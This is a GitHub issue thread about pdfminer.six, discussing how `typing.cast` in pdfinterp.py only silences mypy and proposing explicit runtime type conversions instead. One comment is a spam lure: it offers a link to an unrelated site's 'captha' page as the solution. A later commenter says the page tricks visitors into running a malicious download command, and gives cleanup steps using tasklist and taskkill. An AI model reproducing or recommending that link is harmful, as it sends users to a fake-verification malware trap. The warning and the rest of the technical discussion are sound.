### ISSUE TITLE
Restructure code so that `cast` is less often needed

### ISSUE THREAD

**Issue by dhdaines** [pdfminer/pdfminer.six#1042]
pdfinterp.py is full of code like [this](https://github.com/pdfminer/pdfminer.six/blob/master/pdfminer/pdfinterp.py#L636):
```python
    def do_G(self, gray: PDFStackT) -> None:
        """Set gray level for stroking operations"""
        self.graphicstate.scolor = cast(float, gray)
        self.scs = self.csmap["DeviceGray"]
```
It appears that the intent here (which would be logical to a Java programmer, for instance) is to ensure that the object in question is really a `float`, coercing it if possible, and throwing an exception if not.

Otherwise, various other code down the line will inevitably throw some other, possibly less obvious, exception.  But also, it means that in the case where an object has a union type, e.g. [Color](https://github.com/pdfminer/pdfminer.six/blob/master/pdfminer/pdfinterp.py#L124):
```python
Color = Union[
    float,  # Greyscale
    Tuple[float, float, float],  # R, G, B
    Tuple[float, float, float, float],  # C, M, Y, K
]
```
one could (except one cannot, see below) reliably check at runtime which of the possible values it is.

But that's not what `typing.cast` does!  It is actually type assertion (like `as` in TypeScript) - it says to `mypy`, "I *know* this is a `float` so quit complaining that it isn't".  It does nothing at runtime at all.

This is a longstanding issue for some users of `pdfminer.six`, for example: https://github.com/jsvine/pdfplumber/issues/917#issuecomment-1615259362

It also turns out to be the source of some fuzz errors, since  invalid or corrupted PDFs can easily have objects of the wrong type, and instead of causing a `PDFSyntaxError` or `PDFValueError` this leads to some other exception which is not caught.

**Comment by dhdaines** [comment]
Note that `Color` of 4 values could also be RGBA, but that's beside the point ;-)

**Comment by ummm288** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by KaboChow** [comment]
> to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html) maybe this will solve your problem.

This is a malicious link. Do not click it. It will use machine verification as an excuse to trick you into executing a malicious download command on your computer.

If you have already executed it, you can follow these steps:
1.Disconnect from the internet.
2.Press Win+R, type cmd to open the command line tool, then in the command line input ‘tasklist | findstr powershell’ to list the PowerShell processes, and ‘taskkill /PID <process_id> /F’ to terminate all PowerShell processes.

**Comment by pietermarsman** [comment]
We do know what it means! :smile: 

They were specifically [introduced](https://github.com/pdfminer/pdfminer.six/pull/661) to satisfy mypy when we introduced mypy type checking. And I agree, we should improve the code so that they are not really needed anymore.

**Comment by dhdaines** [comment]
> If this is specific to pdfinterp.py, maybe this is fixed by [#1100](https://github.com/pdfminer/pdfminer.six/pull/1100)? That replaces all the casts with explict conversions, and warnings if that fails.

Yes, this will definitely solve most of the problems - for me it's an open question whether it's preferable to return `None` or just let Python raise a `TypeError` and catch it (possibly converting it to a `PDFSyntaxError`) further down the call stack, but the important thing is just to ensure that type annotations actually have some meaning.
